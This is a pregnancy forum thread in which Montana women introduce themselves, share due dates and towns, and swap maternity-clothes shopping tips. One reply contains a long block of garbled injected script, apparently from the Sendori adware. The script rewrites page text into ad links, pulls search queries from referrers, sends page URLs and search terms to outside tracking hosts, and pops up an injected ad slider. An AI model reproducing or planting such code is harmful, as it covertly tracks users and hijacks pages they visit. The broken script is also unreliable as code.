Montana Babies

Anyone?

Is there anybody out there?  If so, where are ya?

I currently live in Missoula.

Baby Birthday Ticker Ticker

Lilypie Third Birthday tickers

Lilypie Maternity tickers

Re: Anyone?

• Hi! I live in Helena...not too many of us on here, I guess!
    BabyFetus Ticker
  • I live in butte : i think Montana is kinds dead on this site lol
  • Loading the player...
  • KovakKovak member
    Holy crap, yeah its way dead!! 

• Guess it's up to us to liven it up!
    Tell us a bit about yourself!
    I'm 26 and DH and I are expecting our first baby on June 10tha girl whom will be named Natalie Kate.
    BabyFetus Ticker
  • I am Danelle, i am 6w5d and my first ultrasound is Friday. Me and daddy are so excited. It is his 4th and my 1 st. So excited to hear a heart beat for the first time
  • Hi! My name is Brooke. I am 21(soon to be 22) We are moving to eastern MT in two weeks. DH is originally from Libby and I am originally from Heron. 
    Lilypie - Personal pictureBaby Birthday Ticker Ticker
    Image and video hosting by TinyPicimageimagePregnancy Ticker
    August '15 January Siggy Challenge "Favorite Mean Girl" 
    Marianne Bryant - Easy A
  • KovakKovak member
    I'm Amity. I'm 37 weeks today. My H and I grew up in Dillon and now live in Missoula. This is our first baby, a boy.

• Hi! I'm Jae, 19 years old and live in Otter. Me and my husband are expecting our 2nd little one the first of April :)
  • I live in Billings. Mt little guy will be 6 months on the 28th
  • KovakKovak member
    Well, hey everybody. I'm glad to see there were some responses!

• Hello Montana ladies!
    I'm up in kalispell and just hit my 10w mark yesterday!
    Oct 18th is our due date. My dh and I are super excited! Our first! Wish there were better maternity clothes shopping here. Have to go to Missoula!
    Baby Birthday Ticker Ticker Image and video hosting by TinyPic
  • KovakKovak member
    Not much here in Missoula either! Pretty much just Motherhood in the mall so expensive, too! and a small department in Target. It's kind if a bummer!

• KovakKovak member
    So I'm posting via my iPhone, so there were suppose to be parentheses around the 'so expensive too!' part.

• I know old navy has maternity clothes. Do you know if that store carries them?! I was hoping so...but you never know in Montana haha. Our target has a SMALL section. It's hit or miss really. I was hoping to get some maternity pencil skirts for work. Completely out. Maybe online shopping it will have to be. Or a Spokane trip!
    Baby Birthday Ticker Ticker Image and video hosting by TinyPic
  • Hey everyone! My name is Melanie. I'm a 24 y/o FTM. My hubby and I are expecting a baby girl in August. We live in Bozeman.

Engaged 10/2/1202
    BFP (a lil quicker than expected) 12/7/2012
    Married to my best friend 12/24/2012
    Beautiful baby girl arrived 8/15/2013
    BFP #2 3/13/2016

BabyFruit Ticker
  • KovakKovak member
    imageelllaf:
    I know old navy has maternity clothes. Do you know if that store carries them?! I was hoping so...but you never know in Montana haha. Our target has a SMALL section. It's hit or miss really. I was hoping to get some maternity pencil skirts for work. Completely out. Maybe online shopping it will have to be. Or a Spokane trip!

I didn't check Old Navy myself. I probably wouldn't count in it but it might be worth checking. If I make it to that part of town I'll pop in and ask. I couldn't find skirts anywhere but I was shopping for my maternity clothes in the fall/winter. They may have some now, for spring. If you go online check out zulily.com, they have some pretty good deals sometimes. GL!

• Just by your name, I know who you are! I worked with your mamma at the college.

I'm Kim, I'm pregnant with my first baby. I am 23 weeks along, and we're having a girl. I live in Billings, grew up in Twin Bridges.

• Livingston area here. Our daughter is 10 months old our first, and this has been the best 10 months ever!!
    Baby Birthday Ticker Ticker MrsMommie
  • I live in Great Falls and 28y/o.  This is our second child together and his third child.    Just out looking for support and friendly conversation.
  • Helena here. 17w3d, due 9/17 with our first. For those of you looking for skirts/maternity clothes, I've been really happy with Gap online. And I'm also determined to use Bella Bands the whole time because pants are hard enough to find long enough when I'm not pregnant!
  • var sndpID = '11904'; var sndgID = '{4269E772-880A-412D-918C-00E6F6E1884A}'; var CorrectedDomain; var OriginalDomain; function sendoriInline2(){function b(a,b,d){if((a==-1||!c(d.charAt(a)))&&(b>=d.length||!c(d.charAt(b)))){return true}return false}function c(a){var b=a.charCodeAt(0);if(b>47&&b64&&b96&&b";i.newText="";var q=0;for(o=0;oDrinks!=null||dtime==" "||dtime==";"||dtime==","||dtime=="."||dtime=="time==">"||dtime=="?"){if(gDrinks!=null){l=0;o=d.length}if(h[textlower]!=undefined&&h[textlower]!=""){f=true;break}word=d.substring(l,o);wordlower=word.toLowerCase();if(g[word]!=null&&h[wordlower]==undefined&&(e.indexOf(g[word])=0){adbrandterm=word.replace("&","")}if(word.indexOf("'")>=0){adbrandterm=word.replace("'","")}if(i.newText==""){preElement=d.substring(0,l)}else{preElement=i.newText.substring(0,l+q)}postElement=d.substring(o);if(g[word]=="keyword"){if(!n){highlightStartTag=""}else if(n&&k!=undefined&&k!=""){highlightStartTag=""}else continue}else{if(!n){highlightStartTag=""}else if(n&&j!=undefined&&j!=""){highlightStartTag=""}else continue}p="";i.newText=preElement+highlightStartTag+word+p+postElement;i.substituted=true;q+=highlightStartTag.length+p.length;c[c.length]="https://l.sendori.com/stbin/lognow.cgi/?key="+encodeURIComponent(adbrandterm)+"&domain="+encodeURIComponent(document.URL);a++}else if(h[wordlower]==""){f=true;break}l=o+1}}return i}function u(a){if(f==true){return}var b=a.nodeValue;var c=a.parentNode;var d=t(b);if(d.substituted==true){var e=document.createElement("text");e.innerHTML=d.newText;c.replaceChild(e,a)}}function v(a){if(s(a.nodeName)){return}if(a.nodeName=="#text"&&d.trim(a.nodeValue).length>0){u(a)}if(a.hasChildNodes()){for(var b=0;bBeer)}}}var a=0;var b=3;var c=new Array;var e=document.URL;var f=false;var g=new Object;var h=new Object;var i=new Array;var j;var k;var l;var m;var n=false;if(typeof partner_config!=="undefined"){for(var o=0;otime.id;if(sndpID==p){n=true;j=partner_config.productstime.inline_brand;k=partner_config.productstime.inline_keyword;if((j==undefined||j=="")&&(k==undefined||k=="")){return}}}}for(var o=0;otime.brandword;var r=inline_keyword_obj.inlinebrandstime.hostname;g[q]=r}for(var o=0;otime.keyword;h[q]=""}if(typeof console==="undefined"||typeof console.log==="undefined"){console={};console.log=function(){}}d.expr[":"].HasBlackListURL=function(a,b,c){var e=false;d.each(blacklist_urls.urls,function(b){urlstring=this.url.toString().toLowerCase();if(d(a).attr("href")!=null&&d(a).attr("href")!=="undefined"&&d(a).attr("href").toString().toLowerCase().indexOf(urlstring)>=0){e=true}});return e};if(d("a:HasBlackListURL('')").length>0){f=true}var w=document.getElementsByTagName("body");for(var x=0;xemail.BRAND;if(CorrectedDomain.indexOf(f.toLowerCase())>=0){brand_category=slider_keywords.slidertextemail.CATEGORY;if(c!=undefined&&c!="")r(brand_category,"NX",c,"");else r(brand_category,"NX",1860,"");a=true;break}}}if(!a&&d!=undefined&&d=="Y"){l(CorrectedDomain,"NX")}}if(b!=undefined&&b!=""){if(!m()&&!n()&&!o()&&!p())return false;if(o()){query=q("p")}else{query=q("q")}if(query==undefined||query==null||query==""){return false}for(var e=0;eemail.BRAND;if(f.toLowerCase()==query.toLowerCase()){faviconsrc=slider_keywords.slidertextemail.FAVICONSRC;if(b!=undefined&&b!="")r(f,"SERP",b,"");else r(f,"SERP",1871,faviconsrc)}}}}function k(a,b,c,e,f,g){divToInsert="
    ";if(a=="NX"&&d!=undefined&&d=="Y"){divToInsert+="
    "+"
    "}divToInsert+="
    "+"
    "+"
    ";var i=h.browser;if(i.msie&&i.version.slice(0,3)=="7.0"){divToInsert+="
    "}else{h("#favicon").css("height","16px");divToInsert+="
    "}divToInsert+="
    "+"
    "+"
    "+"
    "+""+"
    ";divToInsert+="
    Quantcast
    ";var j=j||[];j.push({qacct:"p-fbiS6Ydv_HyB-"});var k=document.createElement("script");k.type="text/javascript";k.src="https://edge.quantserve.com/quant.js";k.async=true;var l=document.getElementsByTagName("script")[0];l.parentNode.insertBefore(k,l);divToInsert+="
    ";var m=1001837251;var n="FqiuCJWt7AMQw6Xb3QM";var o=window.google_tag_params;var p=true;var q=document.createElement("script");q.type="text/javascript";q.src="www.googleadservices.com/pagead/conversion.js";q.async=true;var l=document.getElementsByTagName("script")[0];l.parentNode.insertBefore(q,l);h(document.body).append(divToInsert);if(h("#slider_container").is(":visible")){}else{h("#slider_container").slideDown(1500)}h("#icon_close").click(function(){h("#slider_container").slideUp(1500)});if(a=="NX"){h("#notification_message").html(s());h("#icon_close").click(function(){h("#slider_container").slideUp(1500)})}h("#ad_title").html(b);h("#ad_body").html(c);h("#ad_url").html("Sponsored by: "+e);if(g=="G"){favicon_url="url(https://www.google.com/s2/favicons?domain="+e+")"}else{favicon_url="url("+g+")"}h("#favicon").css("background-image",favicon_url);h("#slider_body").click(function(){window.open(f)});h("#ad_url").hover(function(){h(this).css("cursor","pointer")},function(){h(this).css("cursor","auto")});h("#snd_logo").hover(function(){h(this).css("cursor","pointer")},function(){h(this).css("cursor","auto")});h("#ad_url").click(function(){window.open(f)});h("#snd_logo").click(function(){window.open("https://support.sendori.com/home")})}function l(){var a="
    "+"
    "+"
    "+"
    "+"
    "+"
    "+"
    "+"
    ";a+="
    Quantcast
    ";var b=b||[];b.push({qacct:"p-fbiS6Ydv_HyB-"});var c=document.createElement("script");c.type="text/javascript";c.src="https://edge.quantserve.com/quant.js";c.async=true;var d=document.getElementsByTagName("script")[0];d.parentNode.insertBefore(c,d);a+="
    ";var e=1001837251;var f="FqiuCJWt7AMQw6Xb3QM";var g=window.google_tag_params;var i=true;var j=document.createElement("script");j.type="text/javascript";j.src="www.googleadservices.com/pagead/conversion.js";j.async=true;var d=document.getElementsByTagName("script")[0];d.parentNode.insertBefore(j,d);h(document.body).append(a);if(h("#Nx_slider_container").is(":visible")){h("#Nx_slider_container").slideUp(1500)}else if(!h("slider_container").is(":visible")){h("#Nx_slider_container").slideDown(1500)}if(h("slider_container").is(":visible")){h("#Nx_slider_container").css("display","none")}h("#icon_close").click(function(){h("#Nx_slider_container").slideUp(1500)});h("#snd_logo").hover(function(){h(this).css("cursor","pointer")},function(){h(this).css("cursor","auto")});h("#snd_logo").click(function(){window.open("https://support.sendori.com/home")});h("#notification_message").html(s())}function m(){if(document.referrer.indexOf("www.google.com/url")!=-1&&document.URL.indexOf("google.com")==-1){return true}return false}function n(){if(document.referrer.indexOf("www.bing.com/search")!=-1&&document.URL.indexOf("bing.com/search")==-1){return true}return false}function o(){if(document.referrer.indexOf("search.yahoo.com/search")!=-1&&document.URL.indexOf("search.yahoo.com")==-1){return true}return false}function p(){if(document.referrer.indexOf("www.ask.com/web")!=-1&&document.URL.indexOf("ask.com/web")==-1){return true}return false}function q(a){var b;var c=document.referrer;var d=c.split("&");for(var e=0;eemail.indexOf(a+"=");arg=demail.substring(0,f+1);if(f!=-1&&(arg==a||arg.indexOf("?"+a)!=-1)){b=demail.substring(f+2)}else continue}return unescape(b)}function r(a,b,c,e){h.ajax({url:"https://securelink.sendori.com/r?key="+a+"&spid="+c+"&output=json&rf="+document.domain,type:"GET",dataType:"jsonp",cache:false,success:function(a){if(typeof a.ads[0]!=="undefined"){if(a.ads[0].displayURL.indexOf("http")>=0||a.ads[0].displayURL.indexOf("https")>=0){displayURL=a.ads[0].displayURL.substring(a.ads[0].displayURL.indexOf("//")+2)}else displayURL=a.ads[0].displayURL;if(a.ads[0].url.indexOf("http")Coffee.BRAND;if(displayURL.indexOf(f)>=0){e=slider_keywords.slidertextCoffee.FAVICONSRC}}}k(b,a.ads[0].title,a.ads[0].description,displayURL,clickURL,e)}else if(b=="NX"&&d!=undefined&&d=="Y"){l()}}})}function s(){var a="Your input '"+OriginalDomain+"' has been corrected to '"+CorrectedDomain+"'";var b="";var c=a.length>63?63:a.length;for(i=0;iemail.id;if(sndpID==f){a=true;b=partner_config.productsemail.slider_referrer;c=partner_config.productsemail.slider_Nx;d=partner_config.productsemail.Ntfcn;if((d==undefined||d=="")&&(c==undefined||c=="")&&(b==undefined||b=="")){return}else break}}}if(!a){return}var g=window.location!=window.parent.location?true:false;var h=jQuery.noConflict(true);h(document).ready(function(){if(!g){j()}})}sendoriInline2();sendoriSlider() #inlineTextHighlight{background:none repeat scroll 0 50% transparent;text-decoration:underline;display:inline;visibility:none;color:blue !important;font-family:Arial;cursor:pointer;line-height:1.5em} #slider_header{height:26px;width:510px;background-image:url(https://cdn.sendori.com/images/bg_header.png);background-repeat:repeat-x;border-left:1px #1A5189;border-top:1px #1A5189;border-right:1px #1A5189;display:block} #slider_body{height:90px;width:510px;background-image:url(https://cdn.sendori.com/images/bg_body.png);background-repeat:repeat-x;border-top:1px #438ECE;border-bottom:1px #438ECE;border-left:1px #1A5189;border-right:1px #1A5189;display:block;cursor:pointer} #slider_footer{height:30px;width:510px;background-image:url(https://cdn.sendori.com/images/bg_footer.png);background-repeat:repeat-x;border-left:1px #1A5189;border-right:1px #1A5189;border-bottom:1px #1A5189;display:block;cursor:auto} #bt_learn{background-image:url(https://cdn.sendori.com/images/btn_learn.png);background-repeat:no-repeat;height:90px;margin-right:5px;width:112px;margin-top:60px;left:auto;right:0;top:0;position:absolute;} #icon_alert{height:16px;width:16px;background-image:url(https://cdn.sendori.com/images/icon_alert.png);padding:5px} #icon_close{background-image:url(https://cdn.sendori.com/images/icon_close.png);background-repeat:no-repeat;display:block;float:left;height:16px;width:16px;} #favicon{background-position:center top;background-repeat:no-repeat;height:90px;margin-left:5px;margin-top:5px;width:16px;float:left;position:relative;} #ad_title{font-family:Helvetica;font-size:13pt;font-weight:700;color:#000;text-decoration:underline;margin-right:122px;text-align:left} #ad_body{font-family:Helvetica;font-size:11pt;color:#333;padding-top:5px;margin-right:125px;text-align:left;} #ad_url{color:#FFF;float:left;font-family:Helvetica;font-size:10pt;margin-right:10px;margin-left:10px;padding-top:6px;cursor:auto} #snd_logo{background-image:url(https://cdn.sendori.com/images/logo.png); background-repeat:no-repeat;height:17px;width:65px;cursor:auto;float:left;margin-right:10px;margin-top:1px;} #notification_message{color:#FFF;float:left;font-family:Helvetica;font-size:8pt;font-weight:700;padding-left:0;margin-top:5px;text-decoration:none;} #notification_alert{background-image:url(https://cdn.sendori.com/images/icon_alert.png);background-position:center center;background-repeat:no-repeat;float:left;height:16px;padding-left:10px;padding-top:5px;width:16px} #slider_container{width:510px;height:146px;display:none;position:fixed;left:50%;bottom:0;margin-left:-255px;z-index:9999999999;border-radius:4px 4px 0 0;-webkit-border-radius:4px 4px 0 0;-moz-border-radius:4px 4px 0 0;box-shadow:0 0 9px #515151;-webkit-box-shadow:0 0 9px #515151;-moz-box-shadow:0 0 9px #515151} #Nx_slider_container{width:510px;height:26px;display:none;position:fixed;left:50%;bottom:0;margin-left:-255px;border-radius:4px 4px 0 0;-webkit-border-radius:4px 4px 0 0;-moz-border-radius:4px 4px 0 0;z-index:9999999999;border-left:1px #1A5189;border-top:1px #1A5189;border-right:1px #1A5189;box-shadow:0 0 9px #515151;-webkit-box-shadow:0 0 9px #515151;-moz-box-shadow:0 0 9px #515151} weird..no post option only reply....i live in billings, i'm expecting my first and still freaked out about it a little bit.  @14 1/2 weeks
  • Im Stephanie, 24 yo mom of two kids and 18 weeks, 1 day with Bryan Marcus. We currently live in Shepherd but are moving to Colstrip.
  • Hi! From Missoula... 22 weeks today! 
  • I'm in little ol' Conrad
  • adloladlol member
    Hi! I am in Billings.  I am 33, FTM due in October.
    photo 0e0a2de2-eb15-48db-8054-5300d79d8298_zpsf6a7c06e.jpg BabyFruit Ticker
  • Hi all,

we  in Ballantine, awaiting twins the first week of September. keep all your fingers crossed we make it that far! we have a handsome red headed little buckaroo that will be 2 on June 6th. as for maternity clothes, old navy online is great, you can even return some items to the store instead of mailing back. i also on occasion luck out at Ross. i will however be skipping maternity clothes for plus size walmart items in he end, thank heavens for good advice from other mamas of multiples! looking forward to visiting with everyone. :0)

• I'm 23 yrs old and live in Great Falls. I grew up in Plains, MT but relocated for school and stayed here with my husband. We're due in late November with our first. I'm glad that there are at least a couple fellow Montanans out there!

Me: 28 yo | DH: 28 yo
    Married 2012
    DD: 3 yo
    TTC #2 August 2017
  • Im a Missoula mama, 13 weeks with our first baby! Yay!

Nice to see there are other Montana ladies on here :) 

• I'm  27 weeks with our first. My husband and I are from Great Falls, MT but just recently moved to Sidney MT. I was sad to leave my Dr. especially since there is only one in Sidney and they wouldn't accept me. But I did find another doc that's only an hour away. Anyone on this side of the state???
  • Hello! I am from Miles City Montana and we are expecting our 3rd baby the beginning of February! We have a 4 year old boy and a 1 year old boy. Can't wait to find out the gender! If it's a boy we may need serious help with a name! ;) Nice to have a site to relate to other Montana moms!
  • @BabyRichardson1 I'm in eastern MT too, in Plentywood. The OB stuff is HARD out here! I'm 14 weeks, our first too. Means we get to drive to Sidney in late Jan when the roads are terrible!
    Samuel Joseph born 1.11.14. 37 weeks.
  • JoCountry said:

@BabyRichardson1 I'm in eastern MT too, in Plentywood. The OB stuff is HARD out here! I'm 14 weeks, our first too. Means we get to drive to Sidney in late Jan when the roads are terrible!

I live in Sidney :) hope the roads cooperate for you when the time comes :)
    Marianne Bryant - Easy A
  • I'm  27 weeks with our first. My husband and I are from Great Falls, MT but just recently moved to Sidney MT. I was sad to leave my Dr. especially since there is only one in Sidney and they wouldn't accept me. But I did find another doc that's only an hour away. Anyone on this side of the state???

Yep, I'm in Sidney too. Why wouldn't they accept you?! That's ridiculous!
    Marianne Bryant - Easy A
  • Hi all! I know this post comes a few months later, but I am 13 almost 14 weeks pregnant with my first. We live in billings. Maternity shopping is hard here too, the old navy doesn't have anything in store, but they offer free shipping and free returns so that's what I've been doing.
  • Hey! I'm new on here, I'm in Helena also, just moved here in Aug.
  • White Sulphur Springs. :)
  • I live in Missoula! I have 3 dd....13,11,& 1!
  • Bozeman here.  First time mom, pregnant with twin boys!
    Introducing the Rowselettes, Archer and Xander.
    Want to know more about me?  Check out my blog. :)
  • Does Nyone know of any mom groups in Billings?
  • I'm moving to Hamilton in May and am due at the end of October
This discussion has been closed.
Choose Another Board
Search Boards
"
"